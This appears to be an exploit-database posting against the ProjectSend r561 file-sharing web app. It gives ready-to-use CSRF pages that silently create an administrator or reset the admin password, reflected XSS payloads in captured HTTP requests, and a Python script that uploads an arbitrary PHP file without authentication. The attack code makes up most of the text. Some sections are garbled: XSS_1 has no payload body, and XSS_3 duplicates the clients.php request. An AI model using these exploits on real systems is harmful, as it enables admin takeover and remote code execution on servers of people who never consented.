ProjectSend r561 CSRF / XSS / Shell Upload



EKU-ID: 4801 CVE: OSVDB-ID:
Author: TUNISIAN CYBER Published: 2015-04-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#[+] Author: TUNISIAN CYBER
#[+] Title: ProjectSend Multiple Vulnerabilities
#[+] Date: 25-04-2015
#[+] Vendor: http://www.projectsend.org/
#[+] Download:http://www.projectsend.org/download/67/
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R

It's a long one so let's start...

I/ CSRF: Add Admin

<html>
<head>
<title>ProjectSend CSRF (Add User)</title>
</head>
<body>
    <form action="http://192.168.186.129/ProjectSend-r561/users-add.php" method="POST" id="CSRF" style="visibility:hidden">
      <input type="hidden" name="add_user_form_name" value="CSRF OPS" />
      <input type="hidden" name="add_user_form_user" value="TUNISIANCYBER" />
      <input type="hidden" name="add_user_form_pass" value="password" />
      <input type="hidden" name="add_user_form_email" value="pwn3d@csrf.com" />
      <input type="hidden" name="add_user_form_level" value="9" />
      <input type="hidden" name="add_user_form_active" checked="checked" />
    </form>
<script>
document.getElementById("CSRF").submit();
</script>
  </body>
</html>

0x0Proof:
http://i.imgur.com/t77Plve.png

II/ CSRF: Change Admin Password:
<html>
<head>
<title>ProjectSend CSRF (Change Password)</title>
</head>
<body>
    <form action="http://192.168.186.129/ProjectSend-r561/users-edit.php?id=1" method="POST" id="CSRF" style="visibility:hidden">
      <input type="hidden" name="add_user_form_name" value="User changed" />
      <input type="hidden" name="add_user_form_user" value="admin" />
      <input type="hidden" name="add_user_form_pass" value="password" />
      <input type="hidden" name="add_user_form_email" value="newemail@opss.net" />
      <input type="hidden" name="add_user_form_level" value="9" />
      <input type="hidden" name="add_user_form_active" checked="checked" />
    </form>
<script>
document.getElementById("CSRF").submit();
</script>
  </body>
</html>

III/ XSS_1 (index.php):
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

0x0Proof:
http://i.imgur.com/TDfFDU3.png

IV/ XSS_2 (clients.php):
http://192.168.186.129/ProjectSend-r561/clients.php

POST /ProjectSend-r561/clients.php HTTP/1.1
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
search=%22%3E%3Cscript%3Ealert%28%220000%22%29%3B%3C%2Fscript%3E
HTTP/1.1 200 OK
Date: Sat, 25 Apr 2015 21:15:13 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2851
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

0x0Proof:
http://i.imgur.com/ywf8JdF.png

V/XSS_3 (actions-log.php)
http://192.168.186.129/ProjectSend-r561/clients.php

POST /ProjectSend-r561/clients.php HTTP/1.1
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
search=%22%3E%3Cscript%3Ealert%28%220000%22%29%3B%3C%2Fscript%3E
HTTP/1.1 200 OK
Date: Sat, 25 Apr 2015 21:15:13 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2851
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

0x0Proof:
http://i.imgur.com/cVKIhj3.png

VI/ File Upload:
(Exploit oirignally found by Fady Mohamed Osman )

Rewrittend by TUNISIAN CYBER

#!/usr/bin/env python
import requests
print"+---------------------------------------+"
print"| ProjectSend File Upload Vulnerability |"
print"+---------------------------------------+"

vuln = raw_input('Vulnerable Site:')
fname = raw_input('EvilFile:')
with open(fname, 'w') as fout:
    fout.write("<?php phpinfo() ?>")
url = vuln +'/process-upload.php' +'?name=' + fname
files = {'file': open(fname, 'rb')}
result = requests.post(url, files=files)
print "===>" +vuln+"/upload/files/"+fname